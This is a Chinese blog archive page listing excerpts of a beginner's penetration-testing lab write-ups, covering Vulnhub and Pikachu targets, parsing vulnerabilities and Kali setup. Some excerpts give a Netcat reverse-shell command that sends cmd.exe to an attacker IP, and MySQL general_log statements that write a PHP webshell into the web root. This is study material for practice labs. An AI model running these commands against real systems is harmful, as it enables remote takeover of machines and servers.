自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

预览 取消 提交

自定义博客皮肤

-+
上一步保存

来到了学渣的博客

虽然起步晚,但我是不会放弃努力的。

  • 博客(27)
  • 收藏
  • 关注
全部文章> 2020年01月
排序:
按最后发布时间
按访问量
RSS订阅
12月 11月 10月 09月 08月 07月 06月 05月 04月 03月 02月 01月

原创 vulnhub渗透系列之Billu_b0x

我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。建议关于vulnhub的靶机,我建议vmbox和vmware两个容器可以切换着来用,有时候vmbox装载靶机之后可能没有IP映射出来,导致你发现不了靶机的地址。当你搞了很久,切换配置Nat或桥接网卡也无法成功时,我建议直接用vmware作为靶机的容器。说...

2020-01-31 20:14:38 1649

原创 Vulhub漏洞复现之Apache解析漏洞总结

我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。前文:名字雷同但差个n的两种类型漏洞环境靶机:vulnhub与vulhub的区别Vulhub漏洞复现之Dns域传送漏洞Vulhub漏洞复现之Django (小于2.0.8)任意url跳转漏洞(CVE-2018-14574)Vulhub漏洞复现之Th...

2020-01-30 19:53:58 3936

原创 常见的解析漏洞总结

我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。Apache 换行解析漏洞其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。例子如下:正常上传.php文件上传不成功,burp抓包后发送到Repeater...

2020-01-30 19:24:15 4105

原创 vulnhub渗透系列之EVM (内含许多疑问!!!)

我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。实验过程总结1.这个靶机做下来,的确是比较好入手比较简单,但不建议去做,因为一些网络配置的问题,的确挺复杂的,不知道如何解决,但如果解决了这个问题,那这个靶机还是很不错的。(见未解决的疑问2.首先还是探测存活的靶机和开放的端口,虽然开放了139、44...

2020-01-28 13:47:07 1774 3

原创 vulnhub渗透系列之DC(一) :内含suid的三种提权方法

我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。实验过程总结1.这个题我觉得对刚入门的我来说,十分的困难,参考了很多资料做了很长的时间才解决2.对端口信息扫描,探测存在22和80端口,但22端口ssh爆破无果,登录网站后发现是Drupal框架,版本是7.x但不确定是哪个x3.利用searchsp...

2020-01-25 21:24:57 2926 1

原创 VirtualBox启动虚拟机报错(Because the USB 2.0.....

VirtualBox打开ova报错页面如下所示Implementation of the USB 2.0 controller not found!Because the USB 2.0 controller state is part of the saved VM state, the VM cannot be started. To fix this problem, either i...

2020-01-25 00:37:17 6603 1

原创 vulnhub渗透系列之lazysysadmin

我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。实验过程总结1.对端口信息扫描,得到22,80,139,445,3306,6667端口2.对22端口进行ssh爆破,发现爆破成功,其实如果爆破不成功也没有关系,因为web渗透会得到关于账号密码的信息3.爆破成功之后ssh连接,发现用户具备超级管理员...

2020-01-22 11:05:04 3818 2

原创 Vulhub漏洞复现之ThinkPHP5.X SQL注入漏洞和敏感信息泄露漏洞

我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。前文:名字雷同但差个n的两种类型漏洞环境靶机:vulnhub与vulhub的区别Vulhub漏洞复现之Dns域传送漏洞Vulhub漏洞复现之Django (小于2.0.8)任意url跳转漏洞(CVE-2018-14574)漏洞影响:<5....

2020-01-21 16:15:23 3243 2

原创 Vulhub漏洞复现之Django (小于2.0.8)任意url跳转漏洞(CVE-2018-14574)

我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。前文:名字雷同但差个n的两种类型漏洞环境靶机:vulnhub与vulhub的区别Vulhub漏洞复现之Dns域传送漏洞什么是任意url跳转漏洞:服务端未对传入的跳转url变量进行检查和控制,可能导致可恶意构造任意一个恶意地址,诱导用户跳转到恶意网...

2020-01-20 21:45:36 2690

原创 vulnhub渗透系列之bulldog

我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。实验过程总结:1. 对端口信息扫描、信息的收集2. 用dirb扫出了许多关键目录3. 仔细观察每一个细节,这个靶机主要在/dev目录处前端源码泄露了MD5密码信息4. 登录了管理员账号后可以在/dev/shell页面利用命令注入漏洞5. 搭建临时...

2020-01-20 00:25:47 1653

原创 kali桥接网络后无法上网解决方法

kali选择桥接网络后无法上网,我自己的解决方法如下:因为我桥接在我的无线网卡:查看无线卡的ip和网关Kali配置:vi /etc/network/interfacesvi /etc/resolv.conf/etc/init.d/networking restart 重启网络尝试ping百度看能否连接,ok 解决问题...

2020-01-19 20:53:48 5563 3

原创 Vulhub漏洞复现之Dns域传送漏洞

我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。前言:名字雷同但差个n的两种类型漏洞环境靶机:vulnhub与vulhub的区别Dns域传送漏洞Dns是什么DNS是一种分布式网络目录服务,主要用于域名与 IP 地址的相互转换,以及控制因特网的电子邮件的发送。它作为将域名和IP地址相互映...

2020-01-19 17:29:08 3623

原创 docker-compose权限不够

root@kali:~# docker-compose version-bash: /usr/local/bin/docker-compose: 权限不够解决chmod +x /usr/local/bin/docker-compose

2020-01-18 21:50:42 14248

原创 2019.4kali安装后界面乱码问题

安装好2019.4kali后出现如下乱码问题用 CTRL+alt+T打开终端后输入以下命令#安装中文包sudo apt-get install ttf-wqy-zenhei#安装完成后重启reboot

2020-01-18 21:14:35 1519

原创 名字雷同但差个n的两种类型漏洞环境靶机:vulnhub与vulhub的区别

我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。VulnhubVulnhub是类似hack the box,一种仿真的渗透环境,需要通过完整的渗透思路,来获得flag,一般一个靶机有好几个flag,把全部flag拿下,才能证明拿下了这个靶机,通过玩这个靶机,可以增强自己的渗透思路和技巧。靶机下载地址...

2020-01-18 16:02:17 3658 1

原创 Pikachu靶机系列之目录遍历、任意文件下载、敏感信息泄露、越权

我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。前文:Pikachu靶机系列之安装环境Pikachu靶机系列之暴力破解(一)Pikachu靶机系列之暴破(二):token防爆破Pikachu靶机系列之XSS(Cross-Site Scripting)Pikachu靶机系列之CSRF(Cross...

2020-01-17 10:54:09 2151 4

原创 Pikachu靶机系列之RCE(remote command/code execute)

我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。前文:Pikachu靶机系列之安装环境Pikachu靶机系列之暴力破解(一)Pikachu靶机系列之暴破(二):token防爆破Pikachu靶机系列之XSS(Cross-Site Scripting)Pikachu靶机系列之CSRF(Cross...

2020-01-15 13:48:45 1773

原创 Pikachu系列之SQL注入(Sql Inject)

我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。本节目录:* 数字型注入(post)* 字符型注入(get)* 搜索型注入* xx型注入* “insert/update”注入* “delete”注入* “http header”注入* 盲注(base on boolian)* 盲注(b...

2020-01-14 18:08:14 3436

原创 Pikachu靶机系列之CSRF(Cross-Site Request Forgery)

我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。本节目录:* 概述* CSRF(get)* CSRF(post)* CSRF(token)前文:Pikachu靶机系列之安装环境Pikachu靶机系列之暴力破解(一)Pikachu靶机系列之暴破(二):token防爆破Pikachu靶机...

2020-01-12 23:38:43 2227 1

原创 Pikachu靶机系列之XSS(Cross-Site Scripting)

我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。本节目录:概述反射型xss(get)反射型xss(post)存储型xssDom型xssDom型xss-sXss盲打Xss之过滤Xss之htmlspecialcharsXss之href输出Xss之js输出麦迪Tmac前文:P...

2020-01-12 00:00:04 2174 1

原创 Pikachu靶机系列之暴破(二):token防爆破

我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。本节目录:* Pikachu之token防爆破实验步骤* 总结前文:Pikachu靶机系列之安装环境Pikachu靶机系列之暴力破解(一)提醒:此题如果字典顺序不好,或者运气不好,可能搞不出来,因为有前些次的经验,判断到他的账户密码一定是...

2020-01-11 11:13:04 3912 3

原创 Pikachu靶机系列之暴力破解(一)

我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。本节目录:一.基于表单的暴力破解二.验证码绕过(on server)服务端三.验证码绕过(on client)前文:Pikachu靶机系列之安装环境一.基于表单的暴力破解暴力破解弱口令,很大程度上要看运气,拿出我常用的用...

2020-01-11 10:17:29 6114

原创 Pikachu靶机系列之安装环境

最近发现了一个靶机,叫Pikachu,十分适合小白或者刚入门的安全学者,漏洞环境挺全的,我打算巩固一下基础,重新学起。废话不多说,开始安装之路:xampp的应用程序可以直接网上搜索后,然后进行下载,正常操作即可。Pikachu靶机下载地址https://github.com/zhuifengshaonianhanlu/pikachu下载好后将pikachu转移至xampp文件下的...

2020-01-10 13:06:29 11327 3

原创 Netcat(NC)正反弹shell

Necat(NC)正反弹shellNetcat反向反弹shell目标:Win7的shell反弹到kali上kali的nc命令nc -lvp 888Win7靶机nc命令* nc64.exe IP 端口号 -e cmd.exe然后可以在kali攻击端控制目标端的win7系统Netcat正向反弹shell目标是将kali上的shell弹到win7上kali的n...

2020-01-07 17:06:24 2059

原创 python爬取i春秋文章标题

最近自学python爬虫入门,好奇想尝试一下环境:python3.8目标:i春秋的视频文章标题代码如下import requestsimport re def getTitle(): url = 'https://bbs.ichunqiu.com/portal.php' headers = { 'Host': 'bbs.ichunqiu.com...

2020-01-01 10:46:27 1095

转载 心脏滴血漏洞复现(CVE-2014-0160)(转载)

漏洞范围:OpenSSL1.0.1版本漏洞成因:Heartbleed漏洞是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容,这样一来受害者的内存内容就会以每次64KB的速度进行泄露。漏洞危害:如同漏洞成因所讲,我们可以通过该漏洞读取每次攻击泄露出来的信息,...

2020-01-01 10:28:56 1076

转载 SQL语句利用日志写shell(转载)

outfile被禁止,或者写入文件被拦截在数据库中操作如下:(必须是root权限)1.show variables like ‘%general%’; #查看配置2.set global general_log = on; #开启general log模式3.set global general_log_file = ‘/var/www/html/1.php’; #设置日志目录为shell...

2020-01-01 09:38:49 1238

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除